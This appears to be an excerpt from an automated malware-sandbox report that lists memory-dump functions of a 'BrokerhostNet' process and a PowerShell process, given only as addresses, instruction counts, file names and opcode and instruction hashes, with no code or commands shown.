Instruction ID: f8ff6f81c7658b508d4e0fa0264a6c86265c78d0b995fad376fd7c589a733ea7
Opcode Fuzzy Hash: 3b268767231142e5fde4782e71ed1fac21d1ebd0cd48719ab495d2b735ab4427
Instruction Fuzzy Hash: 63017131B0991D8FD758DA9CE4515A8B3A1FF54724B01427AD41ED3292CB20BD22CBC4

Function 00007FFD9BEBB71C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb05acfd966a0383b5fdff9edc9c9d286fc6a9092e8d60880e24ad40ed5473b
Instruction ID: 0c13f885f8435a95c572ed70d020daa8211aa07061dc598128c8dcb40b3fc4a8
Opcode Fuzzy Hash: ebb05acfd966a0383b5fdff9edc9c9d286fc6a9092e8d60880e24ad40ed5473b
Instruction Fuzzy Hash: 6D012D25A0EE594FD729EB7588359BE7790FF51214B40077ED08BCB5D3CE18B6098790

Function 00007FFD9BAC0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14453b8266edb7a474e6814a3d4fd3c5b58ffdf0a9f9a9af35b049f56bbd9274
Instruction ID: 9197c9a1594a8aaefe37cb0dbc5f38dec22d88e415b2d25d9202225cefc19fdd
Opcode Fuzzy Hash: 14453b8266edb7a474e6814a3d4fd3c5b58ffdf0a9f9a9af35b049f56bbd9274
Instruction Fuzzy Hash: D001A135A0E78C8FE722EB68C8602ED7FB0EF52210F0646E7D080DB1A2D5341648CB81

Function 00007FFD9BEB5F71 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418f87fe2ed848e1552013c05d0d29f11a9a17620a85c15abefa39caf1e6a21f
Instruction ID: d55f3a565bc38d7d22c3d9c2ad8e58659399aa55260be5ad9ccd6c9753d396c9
Opcode Fuzzy Hash: 418f87fe2ed848e1552013c05d0d29f11a9a17620a85c15abefa39caf1e6a21f
Instruction Fuzzy Hash: C9F0F411B1FEAB4FE77551A9083403C9AD98B4615071A05BBE84BCB1F3ED0A9A026391

Function 00007FFD9BEB66C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c92f48a93eea127fe2e6292b27b361cf33b55cf91269950f44720a01725f13
Instruction ID: 171ac7fdb5f89e1c4a9b6534a349345de84bb9fca80cb89280be5f6c7702506d
Opcode Fuzzy Hash: 55c92f48a93eea127fe2e6292b27b361cf33b55cf91269950f44720a01725f13
Instruction Fuzzy Hash: 08017D3160D58A4FD719CB68D8756E47B90EF12314F1506BED605C71E1C659E610C781

Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae2be2102d6ab9dd55b4d0e779b1eb251f1783f24d4e884b1958e809a9ecb79
Instruction ID: 81581d82fba9c902789125040fcd1c3aed4123829f21aa5a128663b56bfc41c9
Opcode Fuzzy Hash: eae2be2102d6ab9dd55b4d0e779b1eb251f1783f24d4e884b1958e809a9ecb79
Instruction Fuzzy Hash: 54019235A0E38C8FD722EB64C8502DC7FB0AF02314F1541E7D080DB1A2D5345744CB81

Function 00007FFD9BEBAB08 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664ff66b86a45197a451e456296f3b31f17ae59967ad6ad19cb6e1afafb49fb2
Instruction ID: 215004e429c3fa144eaddb7973174a33cd9fe95bfbd3543b7047f1e475eb736f
Opcode Fuzzy Hash: 664ff66b86a45197a451e456296f3b31f17ae59967ad6ad19cb6e1afafb49fb2
Instruction Fuzzy Hash: 9D01F430B0E95F5BDB28CB9DC4B002CF7A2FF003143604279C01A8B292CF28BC118B85

Function 00007FFD9BEB9D82 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0014557e4a1e25cf7f5247dc4c29e66520e9def13ba0bcae1c4754a951936ebf
Instruction ID: 4a44a786af9dc292c292b04a29ecd7d13170ea24a1d045b94d87b5e9dc2f396d
Opcode Fuzzy Hash: 0014557e4a1e25cf7f5247dc4c29e66520e9def13ba0bcae1c4754a951936ebf
Instruction Fuzzy Hash: 97F0963644F2C99FE3129BB188655E97FB4EF43214B1A00F6D449CB0B3C52E1716CB61

Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112d145ab215482b3edb8bb98269e4a8b93bc53549ae5828f922949940778134
Instruction ID: 62ca864d798a202b9a8f0ed953128998cf72a14bd19b7ea5a345f97c00267408
Opcode Fuzzy Hash: 112d145ab215482b3edb8bb98269e4a8b93bc53549ae5828f922949940778134
Instruction Fuzzy Hash: 5D018F35A0E3898FE722EBA488A02ED7FB0AF02314F1541E7D480DB2A7D5785B44C741

Function 00007FFD9BEB0F54 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2c2104fd079ebe261cc4bfa72649ffd202573a7b370edad0b2b9b94f2c23f4b
Instruction ID: 6025473659bdad8605d1f063343c5104777db6cb045948470eea3397233c8c6d
Opcode Fuzzy Hash: b2c2104fd079ebe261cc4bfa72649ffd202573a7b370edad0b2b9b94f2c23f4b
Instruction Fuzzy Hash: 0AF08C01B1F92F4AF73960EB18714BC06469B84E60F560276E41BC62E3EC4E3F462792

Function 00007FFD9BAC1E30 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction ID: 5b2d37ca4b4ee0ed228b7184c73283abff8308722cde694b570618cbc4da2a14
Opcode Fuzzy Hash: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction Fuzzy Hash: F7F01D31B0940E8BEB74BB84C8647F86361AB54311F1602B6C40ED32A1DEB86A818B44

Function 00007FFD9BAC0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5105477ace2000ba8f552d0b118c1f61c750bc64c59b1397bf675f76103bdd1f
Instruction ID: 884c626417feed194adc19ed2f0f23e37b2aaf725ec9f3e377ee3c5324746a63
Opcode Fuzzy Hash: 5105477ace2000ba8f552d0b118c1f61c750bc64c59b1397bf675f76103bdd1f
Instruction Fuzzy Hash: B3F02B3525F648CFC701EB38DCA54D47F60FF43214B8A12FAC489C7562C215585ECB40

Function 00007FFD9BEBB578 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e9dbac670eec8b1a66643289125a9b560f237bc3f1cfe8d767b9e6c64a90fb
Instruction ID: 23c39408d5eeb9ed9861a0f89d7de49ee8fa24bc456c79073f70cff0caaeae6e
Opcode Fuzzy Hash: 67e9dbac670eec8b1a66643289125a9b560f237bc3f1cfe8d767b9e6c64a90fb
Instruction Fuzzy Hash: 3EF0E91CB0F5AE85F63946F6547137C350ADF41300F22067AC64E860F2C80BA7059782

Function 00007FFD9BAC6000 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dfa52ea59d752cdbdd5b7015e58344e59473f0ef2b11a1cb90b3bab6fa68284
Instruction ID: df98a7a581a44db889a485fd7ba8d843c4889971e2b1946b403a043cd7a600a3
Opcode Fuzzy Hash: 5dfa52ea59d752cdbdd5b7015e58344e59473f0ef2b11a1cb90b3bab6fa68284
Instruction Fuzzy Hash: A1F04534518E18CFCB59DF48C8A9AA9B7F1FBAC305F110599D04AEB360CB31AA44CF45

Function 00007FFD9BAC6FE4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction ID: 03183f59e12cfa4b9bcb0a42e0d52873d709c7230d9d84f205269dc2663c1923
Opcode Fuzzy Hash: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction Fuzzy Hash: 2BE01220F0D41A46FBB4B344D8A17BD6261DB54310F1550B9E94EE33D1DD78AF858705

Function 00007FFD9BEB4EF1 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 209ace7e0e6f100dc59b1f70279ad94ccaa8e2e7bb3ce9a2ea6f8d0833ef89aa
Instruction ID: 651bd2022f1b0e320683383cb4cf5cfb03d3e713f62a6fbd89293e0f468ac6d3
Opcode Fuzzy Hash: 209ace7e0e6f100dc59b1f70279ad94ccaa8e2e7bb3ce9a2ea6f8d0833ef89aa
Instruction Fuzzy Hash: BDD0A734D1A60DD7EB21DF9080114FC7374FF40304F104175E81D431D0DA346714AA41

Function 00007FFD9BAC06AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae6f95e128b3ea45cfd2fc39ebe04d9d2b6dde2210adb8cb13aabe576f0446f
Instruction ID: c31a80f9cb361366575a429eeaec478daca8947e69b8cfefd9656cbf0b45c0a8
Opcode Fuzzy Hash: fae6f95e128b3ea45cfd2fc39ebe04d9d2b6dde2210adb8cb13aabe576f0446f
Instruction Fuzzy Hash: 8FC08C00F0F50F00E83037EF18220BCB2004BC4A28FD30132D00C821B19CCE22C6014E

Function 00007FFD9BAC0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction ID: fc6d7208f6bf27d9c99a80edb359d94204f5f6d34c0ef89302a4558f5ef523fc
Opcode Fuzzy Hash: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction Fuzzy Hash: 33C08C305118088FC900F72CC88491032A0FB0D210BC20090E00EC7170E25A9C81C700

Function 00007FFD9BAC64E2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction ID: f3096b5e1962a167101266a7c749055f447a4d6d507bf07500fa61bf0acf7dfe
Opcode Fuzzy Hash: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction Fuzzy Hash: 47D01271F0E55A82F93437D094711BE10909F20350F3B1076D91E1F2F25CEE6F025551

Function 00007FFD9BEB669B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042933c76d9ef3b5da18f791d2b2332bc4c9ee74c8a135bec0cb85b20c92313d
Instruction ID: aa855382d38598e023e82ff1e303c4d66d5ee1e3720da9baf254111207e1d8c7
Opcode Fuzzy Hash: 042933c76d9ef3b5da18f791d2b2332bc4c9ee74c8a135bec0cb85b20c92313d
Instruction Fuzzy Hash: 94D0C910B0F62F8DF53847C34131639A1995F52300E6A003DC06F418E9CD1FFB026B02

Function 00007FFD9BEB166B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4eec3d4080f0b486176db7363fed896a223c67deae6c084d49d25728c38221
Instruction ID: 2b4f1d7d0f397cbd29be30729dfbfa20e69c62baaff36e508b02b459a3afd18e
Opcode Fuzzy Hash: 7c4eec3d4080f0b486176db7363fed896a223c67deae6c084d49d25728c38221
Instruction Fuzzy Hash: ECD09210B2F66B85F23A469241302391598AF51760E6A003EC45F418E9C92A7B016B13

Function 00007FFD9BAC17B6 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a1432a61b964f6f5f024b4c556d1e1660c183bafe75e016d2b82bf6c81fe1f
Instruction ID: 0e4613e4fdddb25e792a692d81d241b9aef272c8f25bcc81d6693b625cc44024
Opcode Fuzzy Hash: 24a1432a61b964f6f5f024b4c556d1e1660c183bafe75e016d2b82bf6c81fe1f
Instruction Fuzzy Hash: 5DC04C01F1C81A06E35E6714443567D08429F54718F558174E11EC73DECD6C6A1316CA

Function 00007FFD9BEB66AE Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521ccb0234cf0d773cb9cb331c81b156bf3a6a25c693f8477ae32a4386c56418
Instruction ID: 517f28fe1b1002a0ddc17a865a22719fceacbdeae731e08c1146bc2026925ed6
Opcode Fuzzy Hash: 521ccb0234cf0d773cb9cb331c81b156bf3a6a25c693f8477ae32a4386c56418
Instruction Fuzzy Hash: 46C08C20A0E20B8FF235479280326357764AF02300F2244B9C40E4A4F6CE2ABB069B22

Function 00007FFD9BEB5BCA Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a57273fb0395776a70830994f84487a6f2060f815e52c77c1111b5c5b6a4fd4
Instruction ID: 1c92615864fd7ace1662a2c127d3dc9d3d7052549509c77892fdd2d0ebc97ab2
Opcode Fuzzy Hash: 6a57273fb0395776a70830994f84487a6f2060f815e52c77c1111b5c5b6a4fd4
Instruction Fuzzy Hash: FDC04840F0F35F5AEA3221E108B407C04C85F16654BAB0A76922A9A1F3EE8AAA081725

Function 00007FFD9BEBAA8C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3f02f1bca24b6d2cdf267fdc5b3c92f9ee9f46f91d761beb284e47d163a0a8
Instruction ID: 2dc91d5f8f780e32f8f48a01eb558f3eb809c3481bd7acd2a05ae725a0c26a3a
Opcode Fuzzy Hash: fe3f02f1bca24b6d2cdf267fdc5b3c92f9ee9f46f91d761beb284e47d163a0a8
Instruction Fuzzy Hash: 6BC02B20F0F34F27EE3108F1853003C10840F021007430531D0068D0F3EC0C2D041762

Function 00007FFD9BAC06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction ID: ee5495ea6a585f2d2bda2960299a2f3079b4c0ca6981180dae3476ee105f8f80
Opcode Fuzzy Hash: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction Fuzzy Hash: 9AB01210D5F40F00E83433FB0D5207870405B84104FC20170D40D8219198CE12950246

Function 00007FFD9BEB0BA1 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d33482d9ed912d142b87ef4e462557893cc630f41e332a6c1f160552963d572
Instruction ID: 2627de8adf021f5794084790817ba388b6dab1fce4c87845391ec3eabb28383c
Opcode Fuzzy Hash: 7d33482d9ed912d142b87ef4e462557893cc630f41e332a6c1f160552963d572
Instruction Fuzzy Hash: 93B01200F2E31B47F53000F304F103C00450B45B08E920530D21B851E3DC4D3E001790

Analysis Process: powershell.exePID: 8044, Parent PID: 7844COMMON

Executed Functions

Function 00007FFD9BA9A114 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2202075280.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc878a7236513377984e4beae02b7070798039ddb063d0c36ce4bf12531c59e3
Instruction ID: 4c702aeaf46c5c787e59eaaab04c117cded2a50ee912ab6d5ae72ee415ef25d5
Opcode Fuzzy Hash: dc878a7236513377984e4beae02b7070798039ddb063d0c36ce4bf12531c59e3
Instruction Fuzzy Hash: A101E87990E7CD4FDB639B248C390547FB0EF67200B1A01EBD489CB0B3DA695A58C792

Function 00007FFD9BA99738 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2202075280.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9f04e6186454ac486f8495cf9351a47c964817d52053b41a0fdaec0c5c3dcb
Instruction ID: 05fcd8f9d597c4234fd019f106f0ff98050b618950dcea4d9d2ee6c0e27805fe
Opcode Fuzzy Hash: be9f04e6186454ac486f8495cf9351a47c964817d52053b41a0fdaec0c5c3dcb
Instruction Fuzzy Hash: F9412A31E0EB885FEB189F5C985A6A87BE0FF54710F50412FE458C3292DA60A9558BC2

Function 00007FFD9B97EAA8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2200814174.00007FFD9B97D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B97D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b97d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f485e69685db4dabb0bd8d3a3f025f5942d3d558b485b89619dc64de713a638
Instruction ID: b0c091a301faddd595019c0eb0e3709ce74e15b879cef6d0189d2454a94e95e0
Opcode Fuzzy Hash: 9f485e69685db4dabb0bd8d3a3f025f5942d3d558b485b89619dc64de713a638
Instruction Fuzzy Hash: 5941297140EBC45FD7579B3998959523FF0EF53320B1A06DFE088CB1A3D625A846C792

Function 00007FFD9BA9A64C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2202075280.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea2877ccdbceaa428409d8796089f4ca22d7dca9be3b2f32140ce0672af96ac
Instruction ID: 9ddc63d26cdf833d2cdbb37014ef3d09eb62e91b48c5a10829a9790709860388
Opcode Fuzzy Hash: aea2877ccdbceaa428409d8796089f4ca22d7dca9be3b2f32140ce0672af96ac
Instruction Fuzzy Hash: 6021093090CB4C4FDB59DFAC9C4A7E97FE0EB56321F04416BD048C3152D6749856CB91

Function 00007FFD9BB6681E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2204188063.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742d74ed01bcb5fe31fb7c019f1145acfd91254a0ff0a07763d93b05677e0689
Instruction ID: 1a23fd67ca5b024f01891e91216fd34246bd1df960bd5a0eb1c9e93dfde653da
Opcode Fuzzy Hash: 742d74ed01bcb5fe31fb7c019f1145acfd91254a0ff0a07763d93b05677e0689
Instruction Fuzzy Hash: 86113632B0E68D8FEBA5EBA894A05A87791EF14324F0944BFC54EC71E3DA24AC00C301

Function 00007FFD9BA933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2202075280.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: e3f7d4d4d58fbdedf9c6af5607cce508aaa45b5c74a85b115e698ec3b0c19091
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 3D01A73020CB0C4FD748EF0CE051AA6B3E0FF85320F10056DE58AC36A1DA32E882CB45

Function 00007FFD9BB6414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2204188063.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb615801eb1c631fa4c7fc3ee2460f25af3ec4fc88e9d42f54f0d91e0d1b4f20
Instruction ID: 842d2942af9155cfead44e196832a3321ad40eb26254a5ae2b6ebb6459a46e54
Opcode Fuzzy Hash: bb615801eb1c631fa4c7fc3ee2460f25af3ec4fc88e9d42f54f0d91e0d1b4f20
Instruction Fuzzy Hash: C7F09A32B0E9098FD768EA4CE4528A877E0FF5532471200BAE16DC71B3CA25EC408B40

Function 00007FFD9BB64400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2204188063.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed0bcd3a173e8f1b605a208e89e4b7d65bab568ff2ba67811a9d1932a88e596
Instruction ID: 17cc528b74b83afbe6dec7fc69cc86df53e983911286c2919163ee4cf276f27a
Opcode Fuzzy Hash: aed0bcd3a173e8f1b605a208e89e4b7d65bab568ff2ba67811a9d1932a88e596
Instruction Fuzzy Hash: 3BF05E32B0E9498FD769EB5CE4628A877E0FF4532475600BAE15DC74A3DA26AC50C750

Function 00007FFD9BB641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2204188063.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
